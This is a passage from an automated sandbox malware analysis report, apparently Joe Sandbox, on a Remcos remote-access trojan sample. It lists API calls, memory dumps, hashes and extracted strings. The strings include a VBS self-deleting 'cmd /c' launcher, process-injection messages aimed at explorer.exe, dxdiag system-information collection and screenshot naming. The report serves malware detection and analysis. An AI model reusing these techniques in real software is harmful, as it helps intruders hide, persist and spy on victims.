  • Part of subcall function 156936F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 15693714
  • Part of subcall function 156936F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 1569372D
  • Part of subcall function 156936F8: RegCloseKey.ADVAPI32(?), ref: 15693738
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 1568D859
• ShellExecuteW.SHELL32(00000000,open,00000000,156E6468,156E6468,00000000), ref: 1568D9B8
• ExitProcess.KERNEL32 ref: 1568D9C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-2411266221
• Opcode ID: 02a5486addaa6b0ae84f2ee698835f8df9a087e3b3ca3e966815b6c00af8dc0c
• Instruction ID: 0fc8388f20f7886ec598920670f49626348cf8a38ec87be6254c38699ff8d3a3
• Opcode Fuzzy Hash: 02a5486addaa6b0ae84f2ee698835f8df9a087e3b3ca3e966815b6c00af8dc0c
• Instruction Fuzzy Hash: 85417475B132189ADB18E764DC94DFEB3B9BF50111F400169E406A71A4FF307E4ACAE8
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 02DFA078
• GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 02DFA08F
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 02DFA095
• IsBadReadPtr.KERNEL32(?,00000004), ref: 02DFA123
• IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 02DFA12F
• IsBadReadPtr.KERNEL32(?,00000014), ref: 02DFA143
Strings
• C:\Windows\System32\KernelBase.dll, xrefs: 02DFA08A
• LoadLibraryExA, xrefs: 02DFA085
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Read$AddressHandleModuleProc
• String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
• API String ID: 1061262613-1650066521
• Opcode ID: 5e29a96d5ef749d99cb97ccaa7e8e1292bb77bd252697d12b234f7daad166e99
• Instruction ID: 37e017bfb1afaf95dfef14d38ea58b244b5f8e63e7a78f7278ceeaa1d0b2f981
• Opcode Fuzzy Hash: 5e29a96d5ef749d99cb97ccaa7e8e1292bb77bd252697d12b234f7daad166e99
• Instruction Fuzzy Hash: 4D315EB5A40305BBEB60DF68DC81F5A77A8EF15364F064558EB19AB380D330ED40CBA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA892
                                                                                                                                                    • GetLastError.KERNEL32(?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA89F
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA8A6
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA8D2
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA8DC
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA8E3
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,15681D55,?), ref: 156BA926
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,15681D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 156BA930
                                                                                                                                                    • __dosmaperr.LIBCMT ref: 156BA937
                                                                                                                                                    • _free.LIBCMT ref: 156BA943
                                                                                                                                                    • _free.LIBCMT ref: 156BA94A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2441525078-0
                                                                                                                                                    • Opcode ID: 412d15293cb99d9904456a16457165d0d6c2f60ef9af85b3f3bd33d8b11ab887
                                                                                                                                                    • Instruction ID: e0787ec128e00dd08826c281c8a1154c2f9c00f929382d683eed2a9f32acd82b
                                                                                                                                                    • Opcode Fuzzy Hash: 412d15293cb99d9904456a16457165d0d6c2f60ef9af85b3f3bd33d8b11ab887
                                                                                                                                                    • Instruction Fuzzy Hash: E231C275A1924AAFCF11AFA8CC44DAE3B6DFF05272B110259F82056590DBB0ED11DBE0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • SetEvent.KERNEL32(?,?), ref: 156854BF
                                                                                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1568556F
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 1568557E
                                                                                                                                                    • DispatchMessageA.USER32(?), ref: 15685589
                                                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,156F4F78), ref: 15685641
                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 15685679
                                                                                                                                                      • Part of subcall function 15684AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 15684B36
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                    • API String ID: 2956720200-749203953
                                                                                                                                                    • Opcode ID: db11657f331798b72d3c8ab0f53837c62fe50d109712001cc8c0ed38319f3813
                                                                                                                                                    • Instruction ID: 800f77a0e7e4a6f3b3da08817c333b2d4be4034fe19aa2bca5384f55ec5ab33f
                                                                                                                                                    • Opcode Fuzzy Hash: db11657f331798b72d3c8ab0f53837c62fe50d109712001cc8c0ed38319f3813
                                                                                                                                                    • Instruction Fuzzy Hash: C141E339B05315ABCB14EB34CCA886F37E9AF85610F40091DF95293694EF34B909CBD6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 156C8135
                                                                                                                                                      • Part of subcall function 156C6782: HeapFree.KERNEL32(00000000,00000000,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?), ref: 156C6798
                                                                                                                                                      • Part of subcall function 156C6782: GetLastError.KERNEL32(?,?,156D0C6F,?,00000000,?,00000000,?,156D0F13,?,00000007,?,?,156D145E,?,?), ref: 156C67AA
                                                                                                                                                    • _free.LIBCMT ref: 156C8141
                                                                                                                                                    • _free.LIBCMT ref: 156C814C
                                                                                                                                                    • _free.LIBCMT ref: 156C8157
                                                                                                                                                    • _free.LIBCMT ref: 156C8162
                                                                                                                                                    • _free.LIBCMT ref: 156C816D
                                                                                                                                                    • _free.LIBCMT ref: 156C8178
                                                                                                                                                    • _free.LIBCMT ref: 156C8183
                                                                                                                                                    • _free.LIBCMT ref: 156C818E
                                                                                                                                                    • _free.LIBCMT ref: 156C819C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 6acc72e9867058ba1bc222e68c75ea4f2fe8022c8e38116a57891fb7f4dfe919
                                                                                                                                                    • Instruction ID: 652feb5b9a04c67109a8879f825b72aba92db432afd318253d7adf7b13eb0d47
                                                                                                                                                    • Opcode Fuzzy Hash: 6acc72e9867058ba1bc222e68c75ea4f2fe8022c8e38116a57891fb7f4dfe919
                                                                                                                                                    • Instruction Fuzzy Hash: 6F11A47E605108AFCB01DF58C840CD93BA5FF08255B4144A6BA589F632DA31FF50DBD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DE2849
                                                                                                                                                    • The unexpected small block leaks are:, xrefs: 02DE2707
                                                                                                                                                    • bytes: , xrefs: 02DE275D
                                                                                                                                                    • Unexpected Memory Leak, xrefs: 02DE28C0
                                                                                                                                                    • , xrefs: 02DE2814
                                                                                                                                                    • 7, xrefs: 02DE26A1
                                                                                                                                                    • An unexpected memory leak has occurred. , xrefs: 02DE2690
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                                    • API String ID: 0-2723507874
                                                                                                                                                    • Opcode ID: 01f2ecb52ca1f3573e3b87e8a640fd538c2055a07e584a8e3f81a3dd87e23670
                                                                                                                                                    • Instruction ID: 0f9fb0567390ad168c5b313b72f95d1cb0797a206b36665376235714d1158a62
                                                                                                                                                    • Opcode Fuzzy Hash: 01f2ecb52ca1f3573e3b87e8a640fd538c2055a07e584a8e3f81a3dd87e23670
                                                                                                                                                    • Instruction Fuzzy Hash: 9871B670A042988FDF21BA2CCC88B99B6F9EB09314F1441E5D94A97381DB754EC5CF61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • __EH_prolog.LIBCMT ref: 15699FB9
                                                                                                                                                    • GdiplusStartup.GDIPLUS(156F4ACC,?,00000000), ref: 15699FEB
                                                                                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 1569A077
                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1569A0FD
                                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 1569A105
                                                                                                                                                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 1569A1F4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                                                                    • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                                                                    • API String ID: 489098229-3790400642
                                                                                                                                                    • Opcode ID: 2fe6075cd85fe534924bd62e9543c1c1fa01f2ee267b5a58aea83191fb993171
                                                                                                                                                    • Instruction ID: b8e57c0ec1dd5e74f344004daf0dcbccb28293c6fa91ca26a8456dfd317e23fe
                                                                                                                                                    • Opcode Fuzzy Hash: 2fe6075cd85fe534924bd62e9543c1c1fa01f2ee267b5a58aea83191fb993171
                                                                                                                                                    • Instruction Fuzzy Hash: D9518D74F02259DACF18EBB4CCA49EEBBB9AF55200F840019E545AB290EF74BD44C7E4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,156D6FFF), ref: 156D5F27
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DecodePointer
                                                                                                                                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                    • API String ID: 3527080286-3064271455
                                                                                                                                                    • Opcode ID: dd27ac71e4814b10120794a476950917c41d3ffabdff0e8800ffb012a84f7051
                                                                                                                                                    • Instruction ID: 22b6ba64a331049751bf82d9ba6a327849f04ee7e922e6780a40fcc127b08d78
                                                                                                                                                    • Opcode Fuzzy Hash: dd27ac71e4814b10120794a476950917c41d3ffabdff0e8800ffb012a84f7051
                                                                                                                                                    • Instruction Fuzzy Hash: EA513B7490571ECBCF00DF68EA845ACFB74FB49310F514A89D4C2ABA54CB329D24CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 156974F5
                                                                                                                                                      • Part of subcall function 1569C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,1568412F,156E5E74), ref: 1569C49E
                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 15697521
                                                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 15697555
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                     • Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                    • API String ID: 1462127192-2001430897
                                                                                                                                                    • Opcode ID: 8f635ac82967c7ea404761f374e67dd67ed07841740a869788d20c1ad9ec5144
                                                                                                                                                    • Instruction ID: 38288c6ad48b43337c5154248e8a561f23304d06f426b9a5dcc6dce39957adfc
                                                                                                                                                    • Opcode Fuzzy Hash: 8f635ac82967c7ea404761f374e67dd67ed07841740a869788d20c1ad9ec5144
                                                                                                                                                    • Instruction Fuzzy Hash: 9D316F79A122199ADF08EBA0DC94EFDB779AF10215F400159E406A7194EF307E8ACAD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32(156F2B14,00000000,156F52D8,00003000,00000004,00000000,00000001), ref: 156873DD
• GetCurrentProcess.KERNEL32(156F2B14,00000000,00008000,?,00000000,00000001,00000000,15687656,C:\Users\user\Desktop\fu56fbrtn8.exe), ref: 1568749E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: CurrentProcess
• String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
• API String ID: 2050909247-4242073005
• Opcode ID: 31a31340e3ab88ea61f53c6c2bc88d9432d30c730bb64d596d31d13f048d4e97
• Instruction ID: f5ce426a3487069958ad14a737cd4f6a94c7f4df74a0e4f0ef6f6e94dbe84eff
• Opcode Fuzzy Hash: 31a31340e3ab88ea61f53c6c2bc88d9432d30c730bb64d596d31d13f048d4e97
• Instruction Fuzzy Hash: 90318975A22314ABD321DF64DCB4F567BBCAB44215F00091AF91196600CF7AB810CFF5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1569D476
  • Part of subcall function 1569D50F: RegisterClassExA.USER32(00000030), ref: 1569D55B
  • Part of subcall function 1569D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 1569D576
  • Part of subcall function 1569D50F: GetLastError.KERNEL32 ref: 1569D580
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 1569D4AD
• lstrcpynA.KERNEL32(156F4B60,Remcos,00000080), ref: 1569D4C7
• Shell_NotifyIconA.SHELL32(00000000,156F4B48), ref: 1569D4DD
• TranslateMessage.USER32(?), ref: 1569D4E9
• DispatchMessageA.USER32(?), ref: 1569D4F3
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1569D500
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 6550cb04e31c7dd8474e235cc034448435f62dac8ade75d9553dd8ddf7658d28
• Instruction ID: 29fbb6a0d3964837061fc419208272d81b59991cc1cfabb9634670df809202c3
• Opcode Fuzzy Hash: 6550cb04e31c7dd8474e235cc034448435f62dac8ade75d9553dd8ddf7658d28
• Instruction Fuzzy Hash: A50139B181026CABDB109FA5CCACF9ABBBDFB81B16F01451EF95083481DB755045CBE0
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1c2f9b3e32efaa2e18540134c58d5b49ad0b691ea3e6c352e25f50e82f64f190
• Instruction ID: 8157f5498078f65ff9803845bf821934b4060dc515dbe2d49b82baedd2af1b7a
• Opcode Fuzzy Hash: 1c2f9b3e32efaa2e18540134c58d5b49ad0b691ea3e6c352e25f50e82f64f190
• Instruction Fuzzy Hash: 51C18274E04289AFDB01CFA8C850BAD7BB5FF1A310F4441D9E965A7381C774A941CBE5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,156D405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 156D3E2F
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3EB2
• __alloca_probe_16.LIBCMT ref: 156D3EEA
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,156D405C,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3F45
• __alloca_probe_16.LIBCMT ref: 156D3F94
• MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3F5C
  • Part of subcall function 156C6137: HeapAlloc.KERNEL32(00000000,156B52BC,?,?,156B8847,?,?,00000000,156F6B50,?,1568DE62,156B52BC,?,?,?,?), ref: 156C6169
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,156D405C,00000000,00000000,?,00000001,?,?,?,?), ref: 156D3FD8
• __freea.LIBCMT ref: 156D4003
• __freea.LIBCMT ref: 156D400F
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
• String ID:
• API String ID: 3256262068-0
• Opcode ID: 3d66bf9010c6092c290bb8216c33853f3067fc8273a07b3a6dc3262dab29def8
• Instruction ID: 345aeeb4e009e4113a47c184d5a36fda977b2a9f818745b42fd03f0630a64fd2
• Opcode Fuzzy Hash: 3d66bf9010c6092c290bb8216c33853f3067fc8273a07b3a6dc3262dab29def8
• Instruction Fuzzy Hash: F991A472F0435A9ADF108F65C880EDEFBB5AF49614F15496AE981E7680DB35EC40CBE0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 156C8215: GetLastError.KERNEL32(?,156BF720,156BA7F5,156BF720,156F4EF8,?,156BCE15,FF8BC35D,156F4EF8,156F4EF8), ref: 156C8219
  • Part of subcall function 156C8215: _free.LIBCMT ref: 156C824C
  • Part of subcall function 156C8215: SetLastError.KERNEL32(00000000,FF8BC35D,156F4EF8,156F4EF8), ref: 156C828D
  • Part of subcall function 156C8215: _abort.LIBCMT ref: 156C8293
• _memcmp.LIBVCRUNTIME ref: 156C5423
• _free.LIBCMT ref: 156C5494
• _free.LIBCMT ref: 156C54AD
• _free.LIBCMT ref: 156C54DF
• _free.LIBCMT ref: 156C54E8
• _free.LIBCMT ref: 156C54F4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: _free$ErrorLast$_abort_memcmp
• String ID: C
• API String ID: 1679612858-1037565863
• Opcode ID: 9caf102036446778c367e133031cf6f0cacfa942edfa2fdf4d5c8c9a8c4ba482
• Instruction ID: 8657e7aa814a6b0ff31084503c3089709d57606c8bb72c73bef3a2d3d8e6b53d
• Opcode Fuzzy Hash: 9caf102036446778c367e133031cf6f0cacfa942edfa2fdf4d5c8c9a8c4ba482
• Instruction Fuzzy Hash: 21B11875A0121ADBDB24DF18CC84A9DB7B5FF58304F5086EAD84AA7750E770AE90CF84
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID:
• String ID: tcp$udp
• API String ID: 0-3725065008
• Opcode ID: 06ab0e4d2f9a821bf71a50e805e7a67e19bc91d00107c3b2fcdeb08902b4dd54
• Instruction ID: b174e86e5d63fb1c047fd884f945d2eb735112be6a42100ad2993b0d54cffb44
• Opcode Fuzzy Hash: 06ab0e4d2f9a821bf71a50e805e7a67e19bc91d00107c3b2fcdeb08902b4dd54
• Instruction Fuzzy Hash: 8D717670A093438FD718CE14C580B2ABBE5FF88356F00492EF89687658EB76D944CBD2
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetThreadLocale.KERNEL32(00000000,02DEC047,?,?,00000000,00000000), ref: 02DEBDB2
  • Part of subcall function 02DEA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DEA79E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1428399500.0000000002DE1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: true
• Associated: 00000000.00000002.1428298505.0000000002DE0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2de0000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Locale$InfoThread
• String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
• API String ID: 4232894706-2493093252
• Opcode ID: 8e6e5ae096b7c4fa0a8d75f9d15a20ec7f22775e044f41647b08c426bf24fee1
• Instruction ID: ff6d325943eb8d4d50b597363bb783fd85b0b79015fa83551d613b5654cd4742
• Opcode Fuzzy Hash: 8e6e5ae096b7c4fa0a8d75f9d15a20ec7f22775e044f41647b08c426bf24fee1
• Instruction Fuzzy Hash: 0A613E35B402899BDF01FBA4D891B9F77B7EB88300F619436E1039B385DA35DD068BA4
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, Offset: 15680000, based on PE: true
• Associated: 00000000.00000002.1441963900.00000000156F4000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1441963900.00000000156F8000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_15680000_fu56fbrtn8.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
